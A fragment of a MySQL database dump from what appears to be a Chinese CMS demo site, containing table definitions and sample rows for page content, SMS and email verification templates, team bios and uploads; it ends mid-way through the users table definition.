INSERT INTO `ey_single_content` VALUES ('1', '1', '1', '<p><br/></p><p>我们的服务宗旨:</p><p>&nbsp;专业,速度,诚信<br/></p><p>服务项目:<br/></p><p>1、全职外教推荐及外教管理:<br/></p><p>&nbsp;随着教学的发展,学校对英语的教学不仅侧重于应试,同时也增加了学生语言应用能力的培养,学校聘请外教人数逐年增多。我公司专业为国内大、中、小及语言培训学校提供符合要求的优质外教资源,外教筛选,初步面试,中间沟通协调,直到外教到位。<br/></p><p>&nbsp;&nbsp;&nbsp; 长期管理型:外教来华后的管理工作例如发放工资、补助、协调关系等由我公司负责,用人单位每月将外教的工资、津贴打入我公司账号,然后由我们支付。我们与聘用单位共同管理专家(外教),避免其随意辞职或者不遵守规章制度等。<br style="padding: 0px; margin: 0px;"/></p><p>&nbsp;</p><p>2、企业培训、及外籍员工推荐。随着中国企业的国际化程度的提高,对员工的语言要求也逐渐提高,我们专业从事企业英语培训,经验丰富的商务英语外教,根据企业实际情况制订专业的培训计划。</p><p>&nbsp;</p><p>3、一对一及小班外语培训。一对一外教的优势在于上课时间、地点、教材随机选择,真正体现个性化教学理念,专业的外教顾问随时为您服务,解决您学习中的任何问题。</p><p><br/></p>', '', '1533541630', '1534403477');
INSERT INTO `ey_single_content` VALUES ('2', '2', '8', '<div style="text-align: center;">手机:1888888999</div><div style="text-align: center;">电话:020-999-888</div><div style="text-align: center;">邮箱:youweb@qq.com</div><p style="text-align: center;">地址:广东省广州市</p><p style="text-align: center;"><iframe class="ueditor_baidumap" src="/public/plugins/Ueditor/dialogs/map/show.html#center=113.271429,23.151818&zoom=13&width=530&height=340&markers=113.271429,23.135336&markerStyles=l,A" frameborder="0" width="534" height="344"></iframe></p>', '', '1686213669', '1686213669');
INSERT INTO `ey_single_content` VALUES ('3', '27', '13', '<h3>严选每一位教师&nbsp; 严把教学质量关</h3><p>· 每一名外教都有本科及以上学历,有过教学经验和商业背景</p><p>· 每一名外教要在总部接受60天封闭培训,最后再经过六轮筛选</p><p>· 拥有TEFL和TESOL国际权威认证和外籍专家证</p><p>· 口音纯正,来自以英语为母语的国家</p><p><br/></p>', '', '1534151326', '1534318765');
-- -----------------------------
-- Table structure for `ey_sms_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sms_log`;
CREATE TABLE `ey_sms_log` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`source` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '发送来源,与场景ID对应:0=注册,1=绑定,2=登录密码,3=支付密码,4=找回密码',
`sms_type` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '短信服务商类型,1---阿里云短信, 2---腾讯云短信',
`mobile` varchar(11) NOT NULL DEFAULT '' COMMENT '手机号',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '发送时间',
`code` varchar(10) NOT NULL DEFAULT '' COMMENT '验证码',
`status` int(1) unsigned NOT NULL DEFAULT '0' COMMENT '发送状态,1:成功,0:失败',
`is_use` int(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否使用,1:是,0:否',
`msg` varchar(255) NOT NULL DEFAULT '' COMMENT '短信内容',
`ip` varchar(20) DEFAULT 'IP地址',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`error_msg` text NOT NULL COMMENT '发送短信异常内容',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='手机短信发送记录';
-- -----------------------------
-- Table structure for `ey_sms_template`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sms_template`;
CREATE TABLE `ey_sms_template` (
`tpl_id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`sms_type` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '短信服务商类型,1---阿里云短信, 2---腾讯云短信',
`tpl_title` varchar(128) NOT NULL DEFAULT '' COMMENT '短信标题',
`sms_sign` varchar(50) NOT NULL DEFAULT '' COMMENT '短信签名',
`sms_tpl_code` varchar(100) NOT NULL DEFAULT '' COMMENT '短信模板ID',
`tpl_content` varchar(1000) NOT NULL DEFAULT '' COMMENT '发送短信内容',
`send_scene` varchar(100) NOT NULL DEFAULT '' COMMENT '短信发送场景',
`is_open` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '是否开启使用这个模板,1为是,0为否。',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) NOT NULL COMMENT '添加时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`tpl_id`)
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8 COMMENT='手机短信发送模板';
-- -----------------------------
-- Records of `ey_sms_template`
-- -----------------------------
INSERT INTO `ey_sms_template` VALUES ('1', '1', '账号注册', '', '', '验证码为 ${content} ,请在30分钟内输入验证。', '0', '1', 'cn', '1613986020', '1613986020');
INSERT INTO `ey_sms_template` VALUES ('2', '1', '手机绑定', '', '', '验证码为 ${content} ,请在30分钟内输入验证。', '1', '1', 'cn', '1613986020', '1613986020');
INSERT INTO `ey_sms_template` VALUES ('3', '1', '找回密码', '', '', '验证码为 ${content} ,请在30分钟内输入验证。', '4', '1', 'cn', '1613986020', '1613986020');
INSERT INTO `ey_sms_template` VALUES ('4', '1', '订单付款', '', '', '您有新的消息:您有新的${content}订单,请注意查收!', '5', '1', 'cn', '1613986020', '1668569108');
INSERT INTO `ey_sms_template` VALUES ('5', '2', '账号注册', '', '', '验证码为 {1} ,请在30分钟内输入验证。', '0', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_sms_template` VALUES ('6', '2', '手机绑定', '', '', '验证码为 {1} ,请在30分钟内输入验证。', '1', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_sms_template` VALUES ('7', '2', '找回密码', '', '', '验证码为 {1} ,请在30分钟内输入验证。', '4', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_sms_template` VALUES ('8', '2', '订单付款', '', '', '您有新的消息:您有新的{1}订单,请注意查收!', '5', '1', 'cn', '1613986047', '1668569108');
INSERT INTO `ey_sms_template` VALUES ('9', '1', '订单发货', '', '', '您有新的消息:您有新的${content}订单,请注意查收!', '6', '1', 'cn', '1613986020', '1668569108');
INSERT INTO `ey_sms_template` VALUES ('10', '2', '订单发货', '', '', '您有新的消息:您有新的{1}订单,请注意查收!', '6', '1', 'cn', '1613986047', '1668569108');
INSERT INTO `ey_sms_template` VALUES ('14', '1', '留言验证', '', '', '验证码为 ${content} ,请在30分钟内输入验证。', '7', '1', 'cn', '1613986020', '1613986020');
INSERT INTO `ey_sms_template` VALUES ('13', '1', '账号登录', '', '', '验证码为 ${content} ,请在30分钟内输入验证。', '2', '1', 'cn', '1613986020', '1613986020');
INSERT INTO `ey_sms_template` VALUES ('15', '2', '账号登录', '', '', '验证码为 {1} ,请在30分钟内输入验证。', '2', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_sms_template` VALUES ('16', '2', '留言验证', '', '', '验证码为 {1} ,请在30分钟内输入验证。', '7', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_sms_template` VALUES ('17', '1', '留言表单', '', '', '您有新的留言消息,请查收!', '11', '1', 'cn', '1613986020', '1613986020');
INSERT INTO `ey_sms_template` VALUES ('18', '2', '留言表单', '', '', '您有新的留言消息,请查收!', '11', '1', 'cn', '1613986047', '1613986047');
-- -----------------------------
-- Table structure for `ey_smtp_record`
-- -----------------------------
DROP TABLE IF EXISTS `ey_smtp_record`;
CREATE TABLE `ey_smtp_record` (
`record_id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`source` tinyint(1) DEFAULT '0' COMMENT '来源,与场景ID对应:0=默认,2=注册,3=绑定邮箱,4=找回密码',
`email` varchar(50) DEFAULT '' COMMENT '邮件地址',
`users_id` int(10) DEFAULT '0' COMMENT '用户ID',
`code` varchar(20) DEFAULT '' COMMENT '发送邮件内容',
`status` tinyint(1) DEFAULT '0' COMMENT '是否使用,默认0,0为未使用,1为使用',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`record_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='邮件发送记录表';
-- -----------------------------
-- Table structure for `ey_smtp_tpl`
-- -----------------------------
DROP TABLE IF EXISTS `ey_smtp_tpl`;
CREATE TABLE `ey_smtp_tpl` (
`tpl_id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`tpl_name` varchar(200) DEFAULT '' COMMENT '模板名称',
`tpl_title` varchar(200) DEFAULT '' COMMENT '邮件标题',
`tpl_content` text COMMENT '发送邮件内容',
`send_scene` tinyint(1) DEFAULT '0' COMMENT '邮件发送场景(1=留言表单)',
`is_open` tinyint(1) DEFAULT '0' COMMENT '是否开启使用这个模板,1为是,0为否。',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '添加时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`tpl_id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='邮件模板表';
-- -----------------------------
-- Records of `ey_smtp_tpl`
-- -----------------------------
INSERT INTO `ey_smtp_tpl` VALUES ('1', '留言表单', '您有新的留言消息,请查收!', '${content}', '1', '1', 'cn', '1544763495', '1552638302');
INSERT INTO `ey_smtp_tpl` VALUES ('2', '会员注册', '验证码已发送至您的邮箱,请登录邮箱查看验证码!', '${content}', '2', '1', 'cn', '1544763495', '1552667056');
INSERT INTO `ey_smtp_tpl` VALUES ('3', '绑定邮箱', '验证码已发送至您的邮箱,请登录邮箱查看验证码!', '${content}', '3', '1', 'cn', '1544763495', '1552667400');
INSERT INTO `ey_smtp_tpl` VALUES ('4', '找回密码', '验证码已发送至您的邮箱,请登录邮箱查看验证码!', '${content}', '4', '1', 'cn', '1544763495', '1552663577');
INSERT INTO `ey_smtp_tpl` VALUES ('5', '订单付款', '您有新的待发货订单消息,请到商城订单查看!', '${content}', '5', '1', 'cn', '1613986020', '1668569108');
INSERT INTO `ey_smtp_tpl` VALUES ('6', '订单发货', '您有新的待收货订单消息,请到会员订单查看!', '${content}', '6', '1', 'cn', '1668569108', '1668569108');
-- -----------------------------
-- Table structure for `ey_special_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_special_content`;
CREATE TABLE `ey_special_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`content` longtext COMMENT '内容详情',
`content_ey_m` longtext COMMENT '手机端内容详情',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='专题附加表';
-- -----------------------------
-- Table structure for `ey_special_node`
-- -----------------------------
DROP TABLE IF EXISTS `ey_special_node`;
CREATE TABLE `ey_special_node` (
`node_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`aid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',
`title` varchar(50) NOT NULL DEFAULT '' COMMENT '节点名称',
`code` varchar(50) NOT NULL DEFAULT '' COMMENT '节点标识',
`isauto` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否自动获取文档',
`keywords` varchar(200) NOT NULL DEFAULT '' COMMENT '关键字(多个中间用'',''分开)',
`typeid` int(10) NOT NULL DEFAULT '0' COMMENT '栏目ID',
`aidlist` text NOT NULL COMMENT '关联文章列表(多个中间用'',''分开)',
`row` int(5) NOT NULL DEFAULT '10' COMMENT '文档数',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态',
`is_del` tinyint(1) unsigned NOT NULL DEFAULT '0',
`sort_order` int(11) DEFAULT '0' COMMENT '排序',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`node_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='专题节点表';
-- -----------------------------
-- Table structure for `ey_sql_cache_table`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sql_cache_table`;
CREATE TABLE `ey_sql_cache_table` (
`cache_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`sql_name` varchar(60) NOT NULL DEFAULT '' COMMENT 'mysql语句的标识名称,目前由模型名称+模型ID组成',
`sql_result` text NOT NULL COMMENT 'mysql执行结果',
`sql_md5` varchar(60) NOT NULL DEFAULT '' COMMENT 'mysql语句MD5的值',
`sql_query` text NOT NULL COMMENT '完整mysql语句',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`cache_id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='mysql缓存表';
-- -----------------------------
-- Records of `ey_sql_cache_table`
-- -----------------------------
INSERT INTO `ey_sql_cache_table` VALUES ('1', 'ArchivesMaxID', '54', '494a17e43cff13eeb4b9c9837c29026c', 'SELECT MAX(aid) AS tp_max FROM `ey_archives` LIMIT 1', '1668569108', '1668569108');
INSERT INTO `ey_sql_cache_table` VALUES ('2', '|model|all|count|', '{\"1\":{\"channel\":1,\"total\":20},\"6\":{\"channel\":6,\"total\":3}}', 'd5ac17fe5649c6d04f4b174c42f2d535', 'SELECT channel, count(aid) as total FROM `ey_archives` WHERE `lang` = \'cn\' AND `status` = 1 AND `is_del` = 0 AND ( (users_id = 0 OR (users_id > 0 AND arcrank >= 0)) ) GROUP BY `channel`', '1668569108', '1668569108');
INSERT INTO `ey_sql_cache_table` VALUES ('3', '|arctype|all|count|', '{\"2\":{\"typeid\":2,\"num\":4},\"3\":{\"typeid\":3,\"num\":4},\"14\":{\"typeid\":14,\"num\":4},\"21\":{\"typeid\":21,\"num\":8}}', '177bb217bb5e0443a5ee349760a0aea7', 'SELECT typeid, count(typeid) as num FROM `ey_archives` WHERE `channel` IN (1,2,3,4,5,7) AND `lang` = \'cn\' AND `is_del` = 0 AND ( (users_id = 0 OR (users_id > 0 AND arcrank >= 0)) ) GROUP BY `typeid`', '1686213630', '1686213630');
-- -----------------------------
-- Table structure for `ey_tagindex`
-- -----------------------------
DROP TABLE IF EXISTS `ey_tagindex`;
CREATE TABLE `ey_tagindex` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`tag` varchar(50) NOT NULL DEFAULT '' COMMENT 'tag内容',
`typeid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '栏目ID',
`litpic` varchar(250) DEFAULT '' COMMENT '封面图',
`seo_title` varchar(200) DEFAULT '' COMMENT 'SEO标题',
`seo_keywords` varchar(200) DEFAULT '' COMMENT 'SEO关键词',
`seo_description` text COMMENT 'SEO描述',
`count` int(10) unsigned DEFAULT '0',
`total` int(10) unsigned DEFAULT '0',
`weekcc` int(10) unsigned DEFAULT '0',
`monthcc` int(10) unsigned DEFAULT '0',
`weekup` int(10) unsigned DEFAULT '0',
`monthup` int(10) unsigned DEFAULT '0',
`is_common` tinyint(1) DEFAULT '0' COMMENT '是否常用标签,0=否,1=是',
`sort_order` int(10) DEFAULT '100' COMMENT '排序号',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(10) unsigned DEFAULT '0',
`update_time` int(10) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `typeid` (`typeid`) USING BTREE,
KEY `count` (`count`,`total`,`weekcc`,`monthcc`,`weekup`,`monthup`,`add_time`) USING BTREE,
KEY `tag` (`tag`) USING BTREE,
KEY `lang` (`lang`,`add_time`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_taglist`
-- -----------------------------
DROP TABLE IF EXISTS `ey_taglist`;
CREATE TABLE `ey_taglist` (
`tid` int(10) unsigned NOT NULL DEFAULT '0',
`aid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文章ID',
`typeid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '栏目ID',
`tag` varchar(50) DEFAULT '' COMMENT 'tag内容',
`arcrank` tinyint(1) DEFAULT '0' COMMENT '阅读权限',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`tid`,`aid`),
KEY `aid` (`aid`,`typeid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='文章标签表';
-- -----------------------------
-- Table structure for `ey_tuadui_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_tuadui_content`;
CREATE TABLE `ey_tuadui_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`zhicheng1` varchar(200) NOT NULL DEFAULT '' COMMENT '职称一',
`zhicheng2` varchar(200) NOT NULL DEFAULT '' COMMENT '职称二',
`zhicheng3` varchar(200) NOT NULL DEFAULT '' COMMENT '职称三',
`zhicheng4` varchar(200) NOT NULL DEFAULT '' COMMENT '职称四',
`jianjie` longtext COMMENT '个人简介',
`zhiwei` varchar(200) NOT NULL DEFAULT '' COMMENT '职位',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_tuadui_content`
-- -----------------------------
INSERT INTO `ey_tuadui_content` VALUES ('1', '12', '1561625442', '1561625442', '高级专业会计硕士', '中国注册资产评估师', '中国注册会计师', '', '<p>会计师事务所股权合伙人,具有近30年执业经验,长期从事会计、审计行业积累了丰富的执业经验,使得他十分擅长于企业财务咨询、税收筹划、重组改制等业务,对现代独立审计和企业管理有着独到见解。</p><p><br/></p><p>联系电话:+86 123-4567</p><p>电子邮箱: admin@youweb.com</p><p><br/></p>', '高级合伙人');
INSERT INTO `ey_tuadui_content` VALUES ('2', '13', '1561625619', '1561625619', '中国注册会计师', '中国注册资产评估师', '中国注册税务师', '高级专业会计硕士', '<p>会计师事务所股权合伙人,具有近30年执业经验,长期从事会计、审计行业积累了丰富的执业经验,使得他十分擅长于企业财务咨询、税收筹划、重组改制等业务,对现代独立审计和企业管理有着独到见解。</p><p><br/></p><p>联系电话:+86 123-4567</p><p>电子邮箱: admin@youweb.com</p>', '高级合伙人');
INSERT INTO `ey_tuadui_content` VALUES ('3', '14', '1561625700', '1561625700', '中国注册会计师', '澳洲会计师公会会员', '美国注册会计师', '英国特许公认会计师公会资深会员', '<p>拥有二十年丰富的审计及财务咨询经验,曾服务包括香港及美国上市公司在内的不同类型的客户,善长于国际准则审计、商定程序的审计及相关服务。为全国注册会计师行业领军人才、英国特许公认会计师公会资深会员、澳洲会计师公会会员、《小型企业财务报表审计工作底稿编制指南》编写组成员。</p><p><br/></p><p>联系电话:+86 400-123-4567</p><p>电子邮箱:admin@youweb.com</p><p><br/></p>', '高级合伙人');
INSERT INTO `ey_tuadui_content` VALUES ('4', '15', '1561625764', '1561625764', '中国注册会计师', '中国注册资产评估师', '中国注册税务师', '', '<p>执业超过二十五年,多年来致力于为外商投资企业和国有企业的客户提供专业服务,涉及行业包括制造、地产、交通运输、酒店及旅游等。她在会计、审计、税务、外汇、咨询方面具备丰富的实务经验。</p><p><br/></p><p>联系电话:+86 400-123-4567</p><p>电子邮箱:admin@youweb.com</p><p><br/></p>', '合伙人');
INSERT INTO `ey_tuadui_content` VALUES ('5', '45', '1561689749', '1561689749', 'CICPA', 'CCPV', 'Master of Professional Accounting', '', '<p>Equity partners of accounting firms, with nearly 30 years of practice experience, have accumulated rich experience in accounting and auditing industry for a long time, which makes him very good at business such as enterprise financial consultation, tax planning, restructuring and restructuring, and has unique views on modern independent auditing and enterprise management.</p><p><br/></p><p>Contact number: +86 123-4567</p><p>E-mail: admin@youweb.com</p><p><br/></p>', 'senior partner');
INSERT INTO `ey_tuadui_content` VALUES ('6', '46', '1561689834', '1561689834', 'CICPA', 'CCPV', 'CICTA', 'Master of Professional Accounting', '<p>Equity partners of accounting firms, with nearly 30 years of practice experience, have accumulated rich experience in accounting and auditing industry for a long time, which makes him very good at business such as enterprise financial consultation, tax planning, restructuring and restructuring, and has unique views on modern independent auditing and enterprise management.</p><p><br/></p><p>Contact number: +86 123-4567</p><p>E-mail: admin@youweb.com</p><p><br/></p>', 'senior partner');
INSERT INTO `ey_tuadui_content` VALUES ('7', '47', '1561689943', '1561689943', 'CICPA', 'CCPV', 'CICTA', 'Master of Professional Accounting', '<p>Equity partners of accounting firms, with nearly 30 years of practice experience, have accumulated rich experience in accounting and auditing industry for a long time, which makes him very good at business such as enterprise financial consultation, tax planning, restructuring and restructuring, and has unique views on modern independent auditing and enterprise management.</p><p><br/></p><p>Contact number: +86 123-4567</p><p>E-mail: admin@youweb.com</p><p><br/></p>', 'senior partner');
INSERT INTO `ey_tuadui_content` VALUES ('8', '48', '1561689988', '1561689988', 'CICPA', 'CCPV', 'Master of Professional Accounting', '', '<p>Equity partners of accounting firms, with nearly 30 years of practice experience, have accumulated rich experience in accounting and auditing industry for a long time, which makes him very good at business such as enterprise financial consultation, tax planning, restructuring and restructuring, and has unique views on modern independent auditing and enterprise management.</p><p><br/></p><p>Contact number: +86 123-4567</p><p>E-mail: admin@youweb.com</p><p><br/></p>', 'Partner');
-- -----------------------------
-- Table structure for `ey_ui_config`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ui_config`;
CREATE TABLE `ey_ui_config` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '表id',
`md5key` varchar(100) NOT NULL DEFAULT '' COMMENT '唯一键值(由 theme_style、page、name)组成',
`theme_style` varchar(200) DEFAULT 'pc' COMMENT '模板风格',
`page` varchar(64) DEFAULT '' COMMENT '页面分组',
`type` varchar(50) DEFAULT '' COMMENT '编辑类型',
`name` varchar(50) DEFAULT '' COMMENT '与页面的e-id对应',
`value` text COMMENT '页面美化的val值',
`idcode` varchar(50) DEFAULT '' COMMENT '页面唯一id标识(由 标识符+栏目id或文档id等)组成',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
UNIQUE KEY `md5key` (`md5key`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='页面美化参数设置';
-- -----------------------------
-- Table structure for `ey_uploads`
-- -----------------------------
DROP TABLE IF EXISTS `ey_uploads`;
CREATE TABLE `ey_uploads` (
`img_id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`type_id` int(10) NOT NULL DEFAULT '0' COMMENT '分组ID',
`aid` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',
`title` varchar(500) DEFAULT '' COMMENT '文档标题',
`image_url` varchar(255) DEFAULT '' COMMENT '文件存储路径',
`intro` varchar(500) DEFAULT '' COMMENT '图集描述',
`width` int(11) DEFAULT '0' COMMENT '图片宽度',
`height` int(11) DEFAULT '0' COMMENT '图片高度',
`filesize` int(11) unsigned DEFAULT '0' COMMENT '文件大小',
`mime` varchar(50) DEFAULT '' COMMENT '图片类型',
`users_id` int(11) DEFAULT '0' COMMENT '用户ID',
`sort_order` smallint(5) DEFAULT '100' COMMENT '排序',
`is_del` tinyint(1) DEFAULT '0' COMMENT '1已删除 0未删除',
`add_time` int(10) unsigned DEFAULT '0' COMMENT '上传时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`img_id`),
KEY `aid` (`aid`) USING BTREE,
KEY `add_time` (`add_time`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='上传记录表';
-- -----------------------------
-- Records of `ey_uploads`
-- -----------------------------
INSERT INTO `ey_uploads` VALUES ('1', '0', '0', 'weixin.jpg', '/uploads/allimg/20230608/1-23060Q6401A46.jpg', '', '200', '200', '25048', 'image/jpeg', '0', '100', '0', '1686213616', '1686213616');
-- -----------------------------
-- Table structure for `ey_uploads_type`
-- -----------------------------
DROP TABLE IF EXISTS `ey_uploads_type`;
CREATE TABLE `ey_uploads_type` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`upload_type` varchar(50) NOT NULL DEFAULT '' COMMENT '名称',
`add_time` int(10) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
UNIQUE KEY `id` (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='上传分组表';
-- -----------------------------
-- Table structure for `ey_urls_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_urls_content`;
CREATE TABLE `ey_urls_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`pagePath` enum('首页','产品列表','信息公开','企业展播','龙凤美景','分销中心','购物车','个人中心','领取优惠券','新闻资讯','签到中心','地址管理','积分商城','砍价活动','拼团活动','我的收藏','我的优惠券','秒杀活动','我的足迹') DEFAULT '首页' COMMENT '跳转路径',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_urls_content`
-- -----------------------------
INSERT INTO `ey_urls_content` VALUES ('1', '113', '1667196112', '1667196112', '新闻资讯');
INSERT INTO `ey_urls_content` VALUES ('2', '114', '1667196466', '1667196466', '个人中心');
INSERT INTO `ey_urls_content` VALUES ('3', '115', '1667198526', '1667198526', '我的足迹');
INSERT INTO `ey_urls_content` VALUES ('4', '116', '1667198828', '1667198828', '首页');
-- -----------------------------
-- Table structure for `ey_users`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users`;
CREATE TABLE `ey_users` (
`users_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '表id',
`username` varchar(30) NOT NULL DEFAULT '' COMMENT '用户名',
`password` varchar(255) NOT NULL DEFAULT '' COMMENT '登录密码',
`nickname` varchar(50) NOT NULL DEFAULT '' COMMENT '昵称',
`is_mobile` tinyint(1) DEFAULT '0' COMMENT '绑定手机号,0为不绑定,1为绑定',
`mobile` varchar(20) NOT NULL DEFAULT '' COMMENT '手机号码(仅用于登录)',
`is_email` tinyint(1) DEFAULT '0' COMMENT '绑定邮箱,0为不绑定,1为绑定',
`email` varchar(60) NOT NULL DEFAULT '' COMMENT '电子邮件(仅用于登录)',
`paypwd` varchar(255) DEFAULT '' COMMENT '支付密码,暂时未用到,可保留。',
`users_money` decimal(10,2) DEFAULT '0.00' COMMENT '用户金额',
`frozen_money` decimal(10,2) DEFAULT '0.00' COMMENT '冻结金额',
`scores` int(10) DEFAULT '0' COMMENT '积分',
`devote` int(10) DEFAULT '0' COMMENT '贡献值',
`reg_time` int(11) unsigned DEFAULT '0' COMMENT '注册时间',
`last_login` int(11) unsigned DEFAULT '0' COMMENT '最后登录时间',
`last_ip` varchar(15) DEFAULT '' COMMENT '最后登录ip',
`login_count` int(11) DEFAULT '0' COMMENT '登陆次数',
`head_pic` varchar(255) DEFAULT '' COMMENT '头像',
`province` int(6) DEFAULT '0' COMMENT '省份',
`city` int(6) DEFAULT '0' COMMENT '市区',
`district` int(6) DEFAULT '0' COMMENT '县',
`level` smallint(5) DEFAULT '0' COMMENT '会员等级',
`open_level_time` int(11) unsigned DEFAULT '0' COMMENT '开通会员级别时间',
`level_maturity_days` varchar(20) DEFAULT '' COMMENT '会员级别到期天数',
`discount` decimal(10,2) DEFAULT '1.00' COMMENT '会员折扣,默认1不享受',
`total_amount` decimal(10,2) DEFAULT '0.00' COMMENT '消费累计额度',
`is_activation` tinyint(1) DEFAULT '1' COMMENT '是否激活,0否,1是。\r\n后台注册默认为1激活。\r\n前台注册时,当会员功能设置选择后台审核,需后台激活才可以登陆。',
`register_place` tinyint(1) DEFAULT '2' COMMENT '注册位置。后台注册不受注册验证影响,1为后台注册,2为前台注册。默认为2。',
`open_id` varchar(50) NOT NULL DEFAULT '' COMMENT '第三方唯一标识openid',
`thirdparty` tinyint(1) DEFAULT '0' COMMENT '第三方注册类型:0=普通,1=微信,2=QQ',
`is_lock` tinyint(1) DEFAULT '0' COMMENT '是否被锁定冻结',
`admin_id` int(10) DEFAULT '0' COMMENT '关联管理员ID',
`lang` varchar(20) DEFAULT 'cn' COMMENT '语言标识',
`is_del` tinyint(1) DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`unread_notice_num` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '未读消息数量',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
`sex` varchar(10) DEFAULT '保密' COMMENT '性别- 男,女,保密',
`coin` int(11) unsigned DEFAULT '0' COMMENT '金币',
